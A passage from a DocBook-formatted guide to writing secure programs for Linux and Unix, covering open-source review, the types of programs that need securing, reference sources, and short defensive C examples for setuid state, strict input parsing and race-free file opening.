review is something that potential users can judge for themselves.
|
||
</para>
|
||
<para>
|
||
One factor that can particularly reduce review likelihood is not actually
|
||
being open source.
|
||
Some vendors like to present their ``disclosed source''
(also called ``source available'') programs as
being open source, but since the program owner has extensive exclusive rights,
others will have far less incentive to work ``for free'' for the owner
on the code.
|
||
Even open source licenses which have unusually
|
||
asymmetric rights (such as the MPL) have this problem.
|
||
After all, people are less likely to voluntarily participate
|
||
if someone else will have rights to their results that they don't have
|
||
(as Bruce Perens says, ``who wants to be someone else's unpaid employee?'').
|
||
In particular,
|
||
since the reviewers with the most incentive tend to be people trying to modify
|
||
the program, this disincentive to participate reduces the number of
|
||
``eyeballs''.
|
||
Elias Levy made this mistake (treating disclosed source programs as open source)
in his article about open source
security; his examples of software that had been broken into
(e.g., TIS's Gauntlet) were not, at the time, open source.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Second, at least some of the people developing and
|
||
reviewing the code must know how to write secure programs.
|
||
Hopefully the existence of this book will help.
|
||
Clearly, it doesn't matter if there are ``many eyeballs'' if none of the
|
||
eyeballs know what to look for.
|
||
Note that it's not necessary for everyone to know how to write
|
||
secure programs, as long as those who do know how are examining the
|
||
code changes.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Third, once found, these problems need to be fixed quickly
|
||
and their fixes distributed.
|
||
Open source systems tend to fix the problems quickly, but the distribution
|
||
is not always smooth.
|
||
For example, the OpenBSD developers do an excellent job of reviewing code for
|
||
security flaws - but they don't always report the identified
|
||
problems back to the original developer.
|
||
Thus, it's quite possible for there to be a fixed version in one system,
|
||
but for the flaw to remain in another.
|
||
I believe this problem is lessening over time, since no one
|
||
``downstream'' likes to repeatedly fix the same problem.
|
||
Of course, ensuring that security patches are actually installed on
|
||
end-user systems is a problem for both open source and closed source software.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
Another advantage of open source is that, if you find a problem, you can
|
||
fix it immediately.
|
||
This really doesn't have any counterpart in closed source.
|
||
</para>
|
||
|
||
<!--
|
||
Could quote some numbers. More NT than Linux vulnerabilities found in 2000;
|
||
more NT web sites defaced, too. But it's hard to really quantify.
|
||
-->
|
||
|
||
<para>
|
||
In short, the effect on security of open source software
|
||
is still a major debate in the security community, though a large number
|
||
of prominent experts believe that it has great potential to be
|
||
more secure.
|
||
</para>
|
||
|
||
</sect2>
|
||
</sect1>
|
||
|
||
<sect1 id="types-of-programs">
|
||
<title>Types of Secure Programs</title>
|
||
|
||
<para>
|
||
Many different types of programs may need to be secure programs
|
||
(as the term is defined in this book).
|
||
Some common types are:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
<para>
|
||
Application programs used as viewers of remote data.
|
||
Programs used as viewers (such as word processors or file format viewers)
|
||
are often asked to view data sent remotely by an untrusted user
|
||
(this request may be automatically invoked by a web browser).
|
||
Clearly, the untrusted
|
||
user's input should not be allowed to cause the application
|
||
to run arbitrary programs.
|
||
It's usually unwise to support initialization macros (run when the data
|
||
is displayed); if you must, then you must create a secure sandbox
|
||
(a complex and error-prone task that almost never succeeds, which is why
|
||
you shouldn't support macros in the first place).
|
||
Be careful of issues such as buffer overflow, discussed in
|
||
<xref linkend="buffer-overflow">, which might
|
||
allow an untrusted user to force the viewer to run an arbitrary program.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Application programs used by the administrator (root).
|
||
Such programs shouldn't trust information that can be controlled
|
||
by non-administrators.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Local servers (also called daemons).
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Network-accessible servers (sometimes called network daemons).
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Web-based applications (including CGI scripts).
|
||
These are a special case of network-accessible servers, but they're
|
||
so common they deserve their own category.
|
||
Such programs are invoked indirectly via a web server, which filters out
|
||
some attacks but nevertheless leaves many attacks that must be withstood.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Applets (i.e., programs downloaded to the client for automatic execution).
|
||
This is something Java is especially famous for, though other languages
|
||
(such as Python) support mobile code as well.
|
||
There are several security viewpoints here; the implementer of the
|
||
applet infrastructure on the client side has to make sure that the
|
||
only operations allowed are ``safe'' ones, and the writer of an applet has
|
||
to deal with the problem of hostile hosts (in other words, you can't
|
||
normally trust the client).
|
||
There is some research attempting to deal with running applets on
|
||
hostile hosts, but frankly
|
||
I'm skeptical of the value of these approaches
|
||
and this subject is exotic enough that I don't cover it further here.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
setuid/setgid programs.
|
||
These programs are invoked by a local user and, when executed, are
|
||
immediately granted the privileges of the program's owner and/or
|
||
owner's group.
|
||
In many ways these are the hardest programs to secure, because so many
|
||
of their inputs are under the control of the untrusted user and some
|
||
of those inputs are not obvious.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
This book merges the issues of these different types of program into
|
||
a single set.
|
||
The disadvantage of this approach is that some of the issues identified
|
||
here don't apply to all types of programs.
|
||
In particular, setuid/setgid programs have many surprising inputs and several
|
||
of the guidelines here only apply to them.
|
||
However, things are not so clear-cut, because
|
||
a particular program may cut across these boundaries (e.g., a CGI script
|
||
may be setuid or setgid, or be configured in a way that has the same effect),
|
||
and some programs are divided into several executables each of which
|
||
can be considered a different ``type'' of program.
|
||
The advantage of considering all of these program types together is that we can
|
||
consider all issues without trying to apply an inappropriate category
|
||
to a program.
|
||
As will be seen, many of the principles apply to all programs that
|
||
need to be secured.
|
||
</para>
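<para>
As a rough illustration of inputs that are ``not obvious,'' the following
sketch in C resets three pieces of state that a setuid/setgid program
inherits from whoever invokes it: the umask, the current directory, and
two environment variables.
The function names, the chosen PATH value, and the selection of inputs
are assumptions made for illustration; the list is far from complete,
and a real program usually needs to clear the whole environment and
deal with other inherited state as well.
</para>
<programlisting><![CDATA[
```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* for setenv() under strict compiler modes */
#endif
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical helper: returns nonzero when the real and effective IDs
 * differ, i.e. when the process is probably running setuid or setgid.
 */
int running_with_borrowed_privileges(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/*
 * Hypothetical helper: replace a few inherited values with known ones.
 * Returns 0 on success, -1 on failure.
 */
int reset_inherited_state(void)
{
    /* The invoking user chose the umask; pick a restrictive one instead. */
    umask(077);

    /* The invoking user chose the current directory. */
    if (chdir("/") != 0)
        return -1;

    /* The invoking user chose every environment variable.  Overwrite two
     * that affect how other programs are found and how shells split words
     * (illustrative values only). */
    if (setenv("PATH", "/bin:/usr/bin", 1) != 0)
        return -1;
    if (setenv("IFS", " \t\n", 1) != 0)
        return -1;
    return 0;
}
```
]]></programlisting>
<para>
A program would typically call something like reset_inherited_state()
at the very start of main(), before it reads any other input.
</para>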
|
||
|
||
<para>
|
||
There is a slight bias in this book toward programs written in
|
||
C, with some notes on other languages such as C++, Perl, PHP, Python,
|
||
Ada95, and Java.
|
||
This is because C is the most common language for
|
||
implementing secure programs on Unix-like systems
|
||
(other than CGI scripts, which tend to use languages such as
|
||
Perl, PHP, or Python).
|
||
Also, most other languages' implementations call the C library.
|
||
This is not to imply that C is somehow the ``best'' language for this purpose,
|
||
and most of the principles described here apply regardless of the
|
||
programming language used.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="paranoia">
|
||
<title>Paranoia is a Virtue</title>
|
||
|
||
<para>
|
||
The primary difficulty in writing secure programs is that
doing so requires a different mind-set: in short, a paranoid mind-set.
The reason is that the impact of errors (also called defects or bugs)
can be profoundly different.
|
||
</para>
|
||
|
||
<para>
|
||
Normal non-secure programs have many errors.
While these errors are undesirable, they usually
involve rare or unlikely situations, and if a user should stumble upon
one they will try to avoid using the tool that way in the future.
|
||
</para>
|
||
|
||
<para>
|
||
In secure programs, the situation is reversed.
|
||
Certain users will intentionally search out and cause rare or unlikely
|
||
situations, in the hope that such attacks will give them unwarranted privileges.
|
||
As a result, when writing secure programs, paranoia is a virtue.
|
||
</para>
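<para>
One way to picture the paranoid mind-set is to look at how a program
accepts a single number from an untrusted source.
The sketch below, built around the hypothetical function parse_port,
treats every ``rare or unlikely'' form of input (empty strings, signs,
leading whitespace, trailing characters, values too large for a long)
as a possible attack and rejects it.
The port-number scenario is an assumption chosen for illustration.
</para>
<programlisting><![CDATA[
```c
#include <errno.h>
#include <stdlib.h>

/*
 * Hypothetical helper: parse text as a decimal TCP port number (1..65535).
 * Returns 0 and stores the value in *port on success; returns -1 for any
 * input that is not exactly a valid port number.
 */
int parse_port(const char *text, int *port)
{
    char *end;
    long value;

    if (text == NULL || port == NULL)
        return -1;

    /* strtol() would skip leading whitespace and accept a sign; reject
     * both (and the empty string) by insisting on a leading digit. */
    if (text[0] < '0' || text[0] > '9')
        return -1;

    errno = 0;
    value = strtol(text, &end, 10);
    if (errno == ERANGE)        /* too large to fit in a long */
        return -1;
    if (*end != '\0')           /* trailing characters such as "80;x" */
        return -1;
    if (value < 1 || value > 65535)
        return -1;

    *port = (int)value;
    return 0;
}
```
]]></programlisting>
<para>
A non-secure program might call atoi() and move on; here each unusual
case is handled explicitly because an attacker will look for exactly
those cases.
</para>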
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="why-write">
|
||
<title>Why Did I Write This Document?</title>
|
||
<!-- ???: Okay, this doesn't really belong here, but I can't figure out
|
||
where else to put it. I don't want the introduction to get longer. -->
|
||
<!-- ???: http://www.wired.com/news/politics/0,1283,34865,00.html
|
||
"Developers Blasted on Security", Reuters, 8:45 a.m. Mar. 9, 2000 PST
|
||
Rich Pethia stated to the U.S. Congress that
|
||
"There is little evidence of improvement in the security features of most
|
||
products,"
|
||
"Developers are not devoting sufficient effort to apply lessons
|
||
learned about the sources of vulnerabilities."
|
||
Richard D. Pethia is manager of the SEI Survivable Systems
|
||
Initiative and first manager of the CERT Coordination Center (CERT/CC).
|
||
(see Spotlight . Volume 1 . Issue 3 . December 1998,
|
||
"Interview with Richard D. Pethia" by Bill Pollak at
|
||
http://interactive.sei.cmu.edu/Features/1998/December/Spotlight/spotlight_dec98.htm
|
||
This interview states "The problem that I see is at the implementation
|
||
level - the code that's going out today is just as buggy as the code
|
||
that went out 10 years ago."
|
||
|
||
|
||
??? : Somehow add:
|
||
"A secure and Open society"
|
||
August 27, 1999
|
||
by Michael MacMillan
|
||
http://www.itworldcanada.com/cw/archive/cw15-17/cw_wtemplate.cfm?filename=c1517n8.htm
|
||
ITworldcanada.com
|
||
(interview with Theo de Raadt,
|
||
head of the OpenBSD project, which is focused on security.
|
||
The problem with professional programmers is not a lack of ability,
|
||
but lack of attention to detail, he said.
|
||
...
|
||
The secret is straightforward - de Raadt and his peers assume that
|
||
every single bug found in the code occurs elsewhere.
|
||
de Raadt admits it sounds simple, but just rooting security bugs
|
||
out of the entire source tree took 10 full-time developers
|
||
one and a half years to complete.
"It's a hell of a lot of work and I think that explains why it hasn't
|
||
been done by many people," he said. www.openbsd.org.
|
||
|
||
???: add info about smartcards, e.g., how to code algorithms so the
|
||
key won't be exposed by power fluctuations.
|
||
|
||
-->
|
||
|
||
|
||
<para>
|
||
One question I've been asked is ``why did you write this book''?
|
||
Here's my answer:
|
||
Over the last several years I've noticed that many developers for
|
||
Linux and Unix
|
||
seem to keep falling into the same security pitfalls, again and again.
|
||
Auditors were slowly catching problems, but it would have been better
|
||
if the problems weren't put into the code in the first place.
|
||
I believe that part of the problem was that there wasn't a single, obvious
|
||
place where developers could go and get information on how to avoid
|
||
known pitfalls.
|
||
The information was publicly available, but it was often hard to find,
|
||
out-of-date, incomplete, or had other problems.
|
||
Most such information didn't particularly discuss Linux at all, even
|
||
though it was becoming widely used!
|
||
That leads up to the answer: I developed this book
|
||
in the hope that future software developers won't repeat
|
||
past mistakes, resulting in more secure systems.
|
||
You can see a larger discussion of this at
|
||
<ulink
|
||
url="http://www.linuxsecurity.com/feature_stories/feature_story-6.html">http://www.linuxsecurity.com/feature_stories/feature_story-6.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
A related question that could be asked is ``why did you write your own book
|
||
instead of just referring to other documents''?
|
||
There are several answers:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
Much of this information was scattered about; placing
|
||
the critical information in one organized document
|
||
makes it easier to use.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Some of this information is not written for the programmer, but
|
||
is written for an administrator or user.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Much of the available information emphasizes portable constructs
(constructs that work on all Unix-like systems), and
fails to discuss Linux at all.
It's often best to avoid Linux-unique abilities for portability's sake,
but sometimes the Linux-unique abilities can really aid security.
Even if non-Linux portability is desired, you may want to support
the Linux-unique abilities when running on Linux.
And, by emphasizing Linux, I can include references to information that
is helpful to someone targeting Linux but is not necessarily true for
other systems.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="sources-of-guidelines">
|
||
<title>Sources of Design and Implementation Guidelines</title>
|
||
|
||
<para>
|
||
Several documents help describe how to write
|
||
secure programs (or, alternatively, how to find security problems in
|
||
existing programs), and were the basis for the guidelines highlighted
|
||
in the rest of this book.
|
||
<!-- ???: Add http://securityparadigm.com's "Computer Vulnerabilities" notes -->
|
||
<!-- ???: Add http://www.linuxhelp.org/lsap.shtml alternatively
|
||
http://ferret.lmh.ox.ac.uk/~security
|
||
Security-Audit's Frequently Asked Questions
|
||
v 1.9 2000/03/21 01:01:08, Jeff Graham <lsap@demit.net> -->
|
||
<!-- I added fish (Dan Farmer's) refs at http://www.fish.com/security -->
|
||
<!-- ??? Really need to emphasize the risks of symbolic/hard links, esp.
|
||
shared directories, such as /tmp. Symbolic links to /dev/zero can
|
||
really do bad things, symbolic links to /etc/passwd is of course
|
||
an ancient attack. -->
|
||
<!-- ??? Mention "terminal" and the possibility of retransmission back -->
|
||
<!-- ???: Traverse the Bugtraq archives, CERT advisories,
|
||
MITRE's CVE at http://cve.mitre.org etc.
|
||
to make sure I've covered the important stuff and pull out good
|
||
examples/stories. -->
|
||
<!-- ???: Add info and reference to
|
||
Landwehr 1994. Landwehr, Carl E., Alan R. Bull, John P. McDermott,
|
||
and William S. Choi. September 1994.
|
||
A Taxonomy of Computer Program Security Flaws.
|
||
ACM Computing Surveys. Vol. 26, No. 3.
|
||
|
||
http://scholar.lib.vt.edu/theses/available/etd-04252001-234145/
|
||
Lough, Daniel Lowry
|
||
"A Taxonomy of Computer Attacks with Applications to Wireless Network"
|
||
Published 2001.
|
||
Summary:
|
||
This research presents a comprehensive analysis of the types of attacks that are being leveled upon computer systems and the
|
||
construction of a general taxonomy and methodologies that will facilitate design of secure protocols. To develop a comprehensive
|
||
taxonomy, existing lists, charts, and taxonomies of host and network attacks published over the last thirty years are examined and
|
||
combined, revealing common denominators among them. These common denominators, as well as new information, are assimilated to
|
||
produce a broadly applicable, simpler, and more complete taxonomy. It is shown that all computer attacks can be broken into a taxonomy
|
||
consisting of improper conditions: Validation Exposure Randomness Deallocation Improper Conditions Taxonomy; hence described by the
|
||
acronym VERDICT.
|
||
|
||
The developed methodologies are applicable to both wired and wireless systems, and they are applied to some existing Internet attacks to
|
||
show how they can be classified under VERDICT. The methodologies are applied to the IEEE 802.11 wireless local area network protocol
|
||
and numerous vulnerabilities are found. Finally, an extensive annotated bibliography is included.
|
||
|
||
http://cr.yp.to/qmail/guarantee.html Qmail
|
||
-->
|
||
|
||
</para>
|
||
|
||
<para>
|
||
For general-purpose servers and setuid/setgid programs, there are a number
|
||
of valuable documents (though some are difficult to find without
|
||
having a reference to them).
|
||
</para>
|
||
|
||
|
||
<para>
|
||
Matt Bishop [1996, 1997]
|
||
has developed several extremely valuable papers and presentations
|
||
on the topic, and in fact he has a web page dedicated to the topic at
|
||
<ulink
|
||
url="http://olympus.cs.ucdavis.edu/~bishop/secprog.html">http://olympus.cs.ucdavis.edu/~bishop/secprog.html</ulink>.
|
||
AUSCERT has released a programming checklist
|
||
<ulink
|
||
url="ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist">[AUSCERT 1996]</ulink>,
|
||
based in part on chapter 23 of Garfinkel and Spafford's book discussing how
|
||
to write secure SUID and network programs
|
||
<ulink
|
||
url="http://www.oreilly.com/catalog/puis">[Garfinkel 1996]</ulink>.
|
||
<ulink
|
||
url="http://www.sunworld.com/swol-04-1998/swol-04-security.html">Galvin [1998a]</ulink> described a simple process and checklist
|
||
for developing secure programs; he later updated the checklist in
|
||
<ulink
|
||
url="http://www.sunworld.com/sunworldonline/swol-08-1998/swol-08-security.html">Galvin [1998b]</ulink>.
|
||
<ulink
|
||
url="http://www.pobox.com/~kragen/security-holes.html">Sitaker [1999]</ulink>
|
||
presents a list of issues for the ``Linux security audit'' team to search for.
|
||
<ulink
|
||
url="http://www.homeport.org/~adam/review.html">Shostack [1999]</ulink>
|
||
defines another checklist for reviewing security-sensitive code.
|
||
The NCSA
|
||
<ulink url="http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming">[NCSA]</ulink>
|
||
provides a set of terse but useful secure programming guidelines.
|
||
Other useful information sources include the
|
||
<emphasis remap="it">Secure Unix Programming FAQ</emphasis>
|
||
<ulink
|
||
url="http://www.whitefang.com/sup/">[Al-Herbish 1999]</ulink>,
|
||
the
|
||
<emphasis remap="it">Security-Audit's Frequently Asked Questions</emphasis>
|
||
<ulink
|
||
url="http://lsap.org/faq.txt">[Graham 1999]</ulink>,
|
||
and
|
||
<ulink
|
||
url="http://www.clark.net/pub/mjr/pubs/pdf/">Ranum [1998]</ulink>.
|
||
Some recommendations must be taken with caution; for example,
the BSD setuid(7) man page
<ulink
url="http://www.homeport.org/~adam/setuid.7.html">[Unknown]</ulink>
recommends the use of access(3) without noting the dangerous race conditions
that usually accompany it.
|
||
Wood [1985] has some useful but dated advice
|
||
in its ``Security for Programmers'' chapter.
|
||
<ulink
|
||
url="http://www.research.att.com/~smb/talks">Bellovin [1994]</ulink>
|
||
includes useful guidelines and some specific examples, such as how to
|
||
restructure an ftpd implementation to be simpler and more secure.
|
||
FreeBSD provides some guidelines in
<ulink
url="http://www.freebsd.org/security/security.html">FreeBSD [1999]</ulink>.
<ulink url="http://developer.gnome.org/doc/guides/programming-guidelines/book1.html">[Quintero 1999]</ulink>
|
||
is primarily concerned with GNOME programming guidelines, but it
|
||
includes a section on security considerations.
|
||
<ulink url="http://www.fish.com/security/murphy.html">[Venema 1996]</ulink>
|
||
provides a detailed discussion (with examples) of some common errors
|
||
when programming secure programs (widely-known or predictable passwords,
|
||
burning yourself with malicious data, secrets in user-accessible data,
|
||
and depending on other programs).
|
||
<ulink url="http://www.fish.com/security/maldata.html">[Sibert 1996]</ulink>
|
||
describes threats arising from malicious data.
|
||
Michael Bacarella's article
|
||
<ulink url="http://m.bacarella.com/papers/secsoft/html">
|
||
The Peon's Guide To Secure System Development</ulink>
|
||
provides a nice short set of guidelines.
|
||
</para>
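<para>
The race condition with access(3) arises because the check and the
later open(2) are separate steps, and the file that a name refers to
can be changed in between.
A minimal sketch of one common alternative is to open the file first
and then examine the opened object with fstat(2).
The function name open_regular_file is hypothetical, and the sketch
assumes a system that provides O_NOFOLLOW (POSIX.1-2008, Linux); it
does not show the switch to the real user and group IDs that a setuid
program would also need to make before calling open.
</para>
<programlisting><![CDATA[
```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* for O_NOFOLLOW under strict compiler modes */
#endif
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Risky pattern (shown only in this comment):
 *     if (access(path, R_OK) == 0) fd = open(path, O_RDONLY);
 * The object that path names can change between the two calls.
 *
 * Hypothetical helper: open path for reading and return a descriptor
 * only if the opened object is a regular file.  Returns -1 otherwise.
 */
int open_regular_file(const char *path)
{
    struct stat st;
    int fd;

    /* O_NOFOLLOW: fail if the final path component is a symbolic link.
     * O_NONBLOCK: do not hang if the name turns out to be a FIFO. */
    fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;

    /* fstat() examines the object actually opened, not whatever the
     * name happens to refer to at some later moment. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        return -1;
    }
    return fd;
}
```
]]></programlisting>
<para>
Because every later operation uses the returned descriptor rather than
the path name, replacing the file after the check no longer changes
which object the program reads.
</para>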
|
||
|
||
<para>
|
||
There are many documents giving security guidelines for
|
||
programs using
|
||
the Common Gateway Interface (CGI) to interface with the web.
|
||
These include
|
||
<!-- ???: Re-examine this one: anything new here? -->
|
||
<ulink url="http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec">Van Biesbrouck [1996]</ulink>,
|
||
<ulink
|
||
url="http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html">Gundavaram [unknown]</ulink>,
|
||
<ulink url="http://webreview.com/wr/pub/97/08/08/bookshelf">
|
||
[Garfinkle 1997]</ulink>,
|
||
<ulink
|
||
url="http://www.eekim.com/pubs/cgibook">Kim [1996]</ulink>,
|
||
<ulink
|
||
url="http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt">Phillips [1995]</ulink>,
|
||
<ulink
|
||
url="http://www.w3.org/Security/Faq/www-security-faq.html">Stein [1999]</ulink>,
|
||
<ulink url="http://members.home.net/razvan.peteanu">[Peteanu 2000]</ulink>,
|
||
and
|
||
<ulink
|
||
url="http://advosys.ca/tips/web-security.html">[Advosys 2000]</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
There are many documents specific to a language, which are further
|
||
discussed in the language-specific sections of this book.
|
||
For example, the Perl distribution includes
|
||
<ulink url="http://www.perl.com/pub/doc/manual/html/pod/perlsec.html">
|
||
perlsec(1)</ulink>, which describes how to use Perl more securely.
|
||
The Secure Internet Programming site at
|
||
<ulink url="http://www.cs.princeton.edu/sip">http://www.cs.princeton.edu/sip</ulink>
|
||
is interested in computer security issues in general, but focuses on
|
||
mobile code systems such as Java, ActiveX, and JavaScript; Ed Felten
|
||
(one of its principals) co-wrote a book on securing Java
|
||
(<ulink url="http://www.securingjava.com">[McGraw 1999]</ulink>)
|
||
which is discussed in <xref linkend="java">.
|
||
Sun's security code guidelines are aimed primarily
at Java and C; they are available at
|
||
<ulink url="http://java.sun.com/security/seccodeguide.html">
|
||
http://java.sun.com/security/seccodeguide.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Yoder [1998] contains a collection of patterns to be used
|
||
when dealing with application security.
|
||
It's not really a specific set of guidelines, but a set of commonly-used
|
||
patterns for programming that you may find useful.
|
||
The Shmoo Group maintains a web page linking to information on
|
||
how to write secure code at
|
||
<ulink url="http://www.shmoo.com/securecode">http://www.shmoo.com/securecode</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
There are many documents describing the issue from
|
||
the other direction (i.e., ``how to crack a system'').
|
||
One example is McClure [1999], and there is a vast amount of material
|
||
from that vantage point on the Internet.
|
||
There are also more general documents on computer architectures and how
attacks must be developed to exploit them, e.g.,
|
||
[LSD 2001].
|
||
The Honeynet Project has been collecting information
|
||
(including statistics) on how attackers
|
||
actually perform their attacks; see their website at
|
||
<ulink url="http://project.honeynet.org">http://project.honeynet.org</ulink>
|
||
for more information.
|
||
</para>
|
||
|
||
<para>
|
||
There's also a large body of information on vulnerabilities
|
||
already identified in existing programs.
|
||
This can be a useful set of
|
||
examples of ``what not to do,'' though it takes effort to extract more
|
||
general guidelines from the large body of specific examples.
|
||
There are mailing lists that discuss security issues; one of the
best known is
|
||
<ulink url="http://SecurityFocus.com/forums/bugtraq/faq.html">
|
||
Bugtraq</ulink>, which among other things develops a list of vulnerabilities.
|
||
The CERT Coordination Center (CERT/CC)
|
||
is a major reporting center for Internet security problems which
|
||
reports on vulnerabilities.
|
||
The CERT/CC occasionally produces advisories that
|
||
provide a description of a serious security problem
|
||
and its impact, along with
|
||
instructions on how to obtain a patch or details of a workaround; for
|
||
more information see
|
||
<ulink url="http://www.cert.org">http://www.cert.org</ulink>.
|
||
Note that originally the CERT was
|
||
a small computer emergency response team, but officially
|
||
``CERT'' doesn't stand for anything now.
|
||
The Department of Energy's
|
||
<ulink url="http://ciac.llnl.gov/ciac">Computer
|
||
Incident Advisory Capability (CIAC)</ulink> also reports on vulnerabilities.
|
||
<!-- Could reference ntbugtraq and the ones listed in
|
||
http://www.cert.org/other_sources/other_teams.html and the
|
||
various backers of CVE -->
|
||
These different groups may identify the same vulnerabilities but use different
|
||
names.
|
||
To resolve this problem,
|
||
MITRE supports the Common Vulnerabilities and Exposures (CVE) list,
which assigns a single unique identifier (``name'')
to each publicly known vulnerability and security exposure
|
||
identified by others; see
|
||
<ulink url="http://www.cve.mitre.org">http://www.cve.mitre.org</ulink>.
|
||
NIST's ICAT
|
||
is a searchable catalog of computer vulnerabilities, categorizing
|
||
each CVE vulnerability so that they can be searched
|
||
and compared later; see
|
||
<ulink url="http://csrc.nist.gov/icat">http://csrc.nist.gov/icat</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
This book is a summary of what I believe are the most
|
||
useful and important guidelines.
|
||
My goal is a book that
|
||
a good programmer can just read and then be fairly well prepared
|
||
to implement a secure program.
|
||
No single document can really meet this goal, but
|
||
I believe the attempt is worthwhile.
|
||
My objective is to strike a balance somewhere between a
|
||
``complete list of all possible guidelines''
|
||
(that would be unending and unreadable)
|
||
and the various ``short'' lists available on-line that are nice and short
|
||
but omit a large number of critical issues.
|
||
When in doubt, I include the guidance; I believe in that case it's better
|
||
to make the information
|
||
available to everyone in this ``one stop shop'' document.
|
||
The organization presented here is my own (every list has its own, different
|
||
structure), and some of the guidelines (especially the Linux-unique
|
||
ones, such as those on capabilities and the FSUID value) are also my own.
|
||
Reading all of the referenced documents listed above as well
|
||
is highly recommended, though I realize that for many it's impractical.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="other-sources">
|
||
<title>Other Sources of Security Information</title>
|
||
|
||
<para>
|
||
There are a vast number of web sites and mailing lists dedicated to
|
||
security issues.
|
||
Here are some other sources of security information:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
<ulink url="http://www.securityfocus.com">Securityfocus.com</ulink>
|
||
has a wealth of general security-related news and information, and hosts
|
||
a number of security-related mailing lists.
|
||
See their website for information on how to subscribe and view their archives.
|
||
A few of the most relevant mailing lists on SecurityFocus are:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
The ``Bugtraq'' mailing list is, as noted above,
|
||
a ``full disclosure moderated mailing list for the detailed discussion and
|
||
announcement of computer security vulnerabilities:
|
||
what they are, how to exploit them, and how to fix them.''
|
||
</para></listitem>
|
||
<listitem><para>
|
||
The ``secprog'' mailing list is
|
||
a moderated mailing list for the discussion of secure software
|
||
development methodologies and techniques.
|
||
I specifically monitor this list, and I coordinate with its moderator
|
||
to ensure that resolutions reached in SECPROG (if I agree with them)
|
||
are incorporated into this document.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
The ``vuln-dev'' mailing list discusses potential or undeveloped holes.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para></listitem>
|
||
<listitem><para>
|
||
IBM's ``developerWorks: Security'' has a library of interesting articles.
|
||
You can learn more from
|
||
<ulink url="http://www.ibm.com/developer/security">http://www.ibm.com/developer/security</ulink>.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
For Linux-specific security information, a good source is
|
||
<ulink url="http://www.linuxsecurity.com">LinuxSecurity.com</ulink>.
|
||
If you're interested in auditing Linux code, places to see include
the <ulink url="http://www.linuxhelp.org/lsap.shtml">Linux
Security-Audit Project FAQ</ulink>
and the <ulink url="http://www.lkap.org">Linux Kernel Auditing Project</ulink>,
both of which are dedicated to auditing Linux code for security issues.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
Of course, if you're securing specific systems, you should sign up to
|
||
their security mailing lists (e.g., Microsoft's, Red Hat's, etc.)
|
||
so you can be warned of any security updates.
|
||
</para>
|
||
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="conventions">
|
||
<title>Document Conventions</title>
|
||
|
||
<para>
|
||
System manual pages are referenced in the format <emphasis remap="it">name(number)</emphasis>,
|
||
where <emphasis remap="it">number</emphasis> is the section number of the manual.
|
||
The pointer value that means ``does not point anywhere'' is called NULL;
|
||
C compilers will convert the integer 0 to the value NULL in most circumstances
|
||
where a pointer is needed,
|
||
but note that nothing in the C standard requires that NULL actually
|
||
be implemented by a series of all-zero bits.
|
||
C and C++ treat the character '\0' (ASCII 0) specially, and this value
|
||
is referred to as NIL in this book (this is usually called ``NUL'',
|
||
but ``NUL'' and ``NULL'' sound identical).
|
||
Function and method names always use the correct case, even if that means
|
||
that some sentences must begin with a lower case letter.
|
||
I use the term ``Unix-like'' to mean Unix, Linux, or other systems whose
|
||
underlying models are very similar to Unix;
|
||
I can't say POSIX, because there are systems such as Windows 2000 that
|
||
implement portions of POSIX yet have vastly different security models.
|
||
</para>
|
||
|
||
<para>
|
||
An attacker is called an ``attacker'', ``cracker'', or ``adversary'',
|
||
and not a ``hacker''.
|
||
Some journalists mistakenly use the word ``hacker'' instead of ``attacker'';
|
||
this book avoids this misuse, because many
|
||
Linux and Unix developers refer to themselves as ``hackers''
|
||
in the traditional non-evil sense of the term.
|
||
To many Linux and Unix developers, the term ``hacker'' continues
|
||
